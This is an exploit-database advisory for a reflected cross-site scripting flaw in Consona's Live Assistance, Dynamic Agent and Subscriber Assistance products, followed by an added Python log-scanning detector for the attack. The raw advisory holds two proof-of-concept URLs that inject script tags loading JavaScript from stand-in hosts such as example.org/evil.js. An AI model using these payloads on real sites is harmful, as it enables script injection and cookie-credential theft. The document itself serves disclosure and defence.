vendor: Consona Live Assistance, Consona Dynamic Agent, Consona Subscriber Assistance
by:
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting)
Product Name: Consona Live Assistance, Consona Dynamic Agent, Consona Subscriber Assistance
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting Vulnerability in Consona Products

The Consona products, including Consona Live Assistance, Consona Dynamic Agent, and Consona Subscriber Assistance, are prone to a cross-site scripting vulnerability. An attacker can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can lead to the theft of cookie-based authentication credentials and other possible attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by Consona (formerly SupportSoft). Additionally, users should be cautious when visiting unfamiliar websites or following unknown links.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39999/info

Multiple Consona (formerly SupportSoft) products are prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials; other attacks are possible.

The following are vulnerable:
Consona Live Assistance
Consona Dynamic Agent
Consona Subscriber Assistance 

http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=";}</script><script src="http://www.example.org/pluginlicense.js" type="text/javascript"></script><script>RenderLicense();</script><script>function returnback(){ var cnfctl = new ActiveXObject("SdcUser.TgConfCtl"); cnfctl.WHATEVER();}</script><!--
http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=</script><script src=http://www.example.org/evil.js></script><script>function returnback() {document.write(license);document.write(payload);}</script>
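
A detection check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web access logs for requests to the affected endpoint whose `backurl` value decodes to characters that can leave a script context. The combined log format, the case-insensitive matching and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Endpoint and parameter taken from the advisory's sample requests.
ENDPOINT = "/sdccommon/verify/asp/n6plugindestructor.asp"
PARAM = "backurl"
# Characters that let a reflected value leave a quoted string or script block.
BREAKOUT = re.compile(r"[<>\"'\\\r\n]")
# Assumption: combined log format, request line inside double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses and paths, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sdccommon/verify/asp/'
    'n6plugindestructor.asp?backurl=/sdccommon/home.asp HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /sdccommon/verify/asp/'
    'n6plugindestructor.asp?backurl=%22%3B%7D%3C/script%3E HTTP/1.1" 200 640',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /SdcCommon/verify/asp/'
    'N6PluginDestructor.asp?BackURL=%253C/script%253E HTTP/1.1" 200 640',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.asp?q=%3Cb%3E HTTP/1.1" 200 99',
]


def backurl_values(target):
    """Return the decoded backurl values if target addresses the endpoint."""
    path, _, query = target.partition("?")
    if unquote(path).lower() != ENDPOINT:  # assumed case-insensitive, as on IIS
        return []
    values = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == PARAM:
            # Decode twice so double-encoded input (%253C) is also caught.
            values.append(unquote_plus(unquote_plus(value)))
    return values


def scan(lines):
    """Return (line_number, decoded_value) for each request whose backurl
    contains a character that can break out of the script context."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        for value in backurl_values(match.group(1)):
            if BREAKOUT.search(value):
                hits.append((number, value))
    return hits
```

Calling `scan(SAMPLE)` flags the second and third sample lines and ignores the benign return path and the unrelated endpoint.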